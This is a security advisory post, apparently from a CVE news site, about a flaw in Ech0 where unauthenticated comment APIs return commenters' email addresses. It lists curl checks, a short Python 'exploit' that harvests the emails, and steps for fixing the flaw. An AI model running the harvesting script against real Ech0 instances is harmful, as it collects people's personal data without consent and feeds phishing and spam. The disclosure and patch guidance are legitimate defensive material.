Ech0, PII Leak, GHSA-rj4g-rqgh-rx9h (Medium)

By /

Listen to this Post

How GHSA-rj4g-rqgh-rx9h Works

The `Comment` model in `internal/model/comment/comment.go` (lines 33–37) defines an `Email` field with json:"email", while adjacent PII fields `IPHash` and `UserAgent` correctly use `json:”-“` to hide them from API responses. The public endpoints `GET /api/comments?echo_id=X` and `GET /api/comments/public?limit=N` are both mounted on an unauthenticated PublicRouterGroup. Their handlers call `ListPublicByEchoID` (service layer, line 329) or `ListPublicComments` (line 340), which return slices of the full `Comment` structs directly to ctx.JSON. Because the `Email` field lacks the `json:”-“` tag, GORM materializes the complete struct and the Gin‑based API returns it verbatim, exposing every commenter’s email address.
Platform: Ech0
Version: < 1.4.8
Vulnerability : PII Exposure
Severity: Medium
Date: 2026‑05‑03

Prediction: Patch 2026‑05‑03

Analytics under heading What Undercode Say:

Search for exposed emails in API output
curl -s "http://localhost:8300/api/comments/public?limit=100" | jq '.data[].email'
Count unique exposed emails
curl -s "http://localhost:8300/api/comments/public?limit=1000" | jq '[.data[].email] | unique | length'
Check if email field is still present in response
curl -s "http://localhost:8300/api/comments?echo_id=YOUR_ECHO_ID" | jq '.data[bash] | has("email")'

Exploit:

import requests
TARGET = "http://localhost:8300"
Harvest emails from cross-echo feed
r = requests.get(f"{TARGET}/api/comments/public", params={"limit": 1000})
emails = [c.get("email") for c in r.json()["data"] if c.get("email")]
print(f"Exposed {len(emails)} guest commenter email addresses")

Protection from this CVE

  1. Change the JSON tag on `Email` field to `json:”-“` to match `IPHash` and UserAgent.
  2. Alternatively, introduce a `PublicComment` DTO that projects only non‑sensitive fields and use that for public API responses.
  3. Upgrade to Ech0 version ≥ `1.4.8-0.20260503034700-cb8d7a997dd8` where the fix is applied.

Impact

  • Anonymous attacker harvests all guest commenter email addresses via unauthenticated HTTP calls.
  • Emails collected can be correlated with nicknames and echo topics to conduct targeted phishing or spam campaigns.
  • Violates GDPR/CCPA because personal data is exposed to any internet visitor without user consent.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top